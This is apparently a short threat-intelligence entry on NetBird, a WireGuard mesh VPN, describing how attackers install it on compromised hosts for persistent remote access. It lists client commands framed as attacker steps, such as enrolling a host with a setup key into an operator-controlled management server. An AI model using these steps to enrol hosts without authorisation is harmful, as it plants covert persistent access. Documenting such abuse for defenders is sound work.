NetBird is a WireGuard-based overlay network and zero-trust remote access service that connects peers into a private mesh through NetBird management and signal servers, traversing NAT and firewalls without inbound ports. Threat actors have been observed deploying the NetBird client on compromised hosts to establish persistent, encrypted remote access into internal environments.
Enrolls the host into a NetBird network using a setup key and brings the WireGuard-based tunnel up, joining the host to the attacker-controlled mesh.
netbird up --setup-key <KEY>
Enrolls the host against a specified (including self-hosted) NetBird management server, joining a custom overlay network controlled by the operator.
netbird up --management-url <URL> --setup-key <KEY>
Shows the status of the NetBird connection and connected peers, confirming the host is reachable within the overlay network.
netbird status